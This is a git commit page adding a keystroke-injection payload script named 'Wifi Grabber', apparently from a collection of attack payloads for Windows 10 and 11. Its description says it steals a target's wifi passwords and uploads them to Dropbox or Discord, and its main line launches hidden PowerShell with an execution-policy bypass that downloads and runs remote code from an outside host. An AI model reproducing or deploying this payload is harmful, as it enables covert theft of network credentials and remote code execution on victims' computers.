Add files via upload
This commit is contained in:
parent
0c0b029e86
commit
25fcf460e5
77 changed files with 6590 additions and 0 deletions
12
Payloads/WifiGrabber/WifiGrabber.txt
Normal file
12
Payloads/WifiGrabber/WifiGrabber.txt
Normal file
|
@ -0,0 +1,12 @@
|
|||
REM Title: Wifi Grabber
|
||||
|
||||
REM Author: I am Jakoby
|
||||
|
||||
REM Description: This payload grabs your target's wifi passwords and uploads them to either Dropbox, Discord, or both.
|
||||
|
||||
REM Target: Windows 10, 11
|
||||
|
||||
GUI r
|
||||
DELAY 500
|
||||
STRING powershell -w h -NoP -Ep Bypass $dc='';$db='';irm jakoby.lol/e8v | iex
|
||||
ENTER
|
Loading…
Add table
Add a link
Reference in a new issue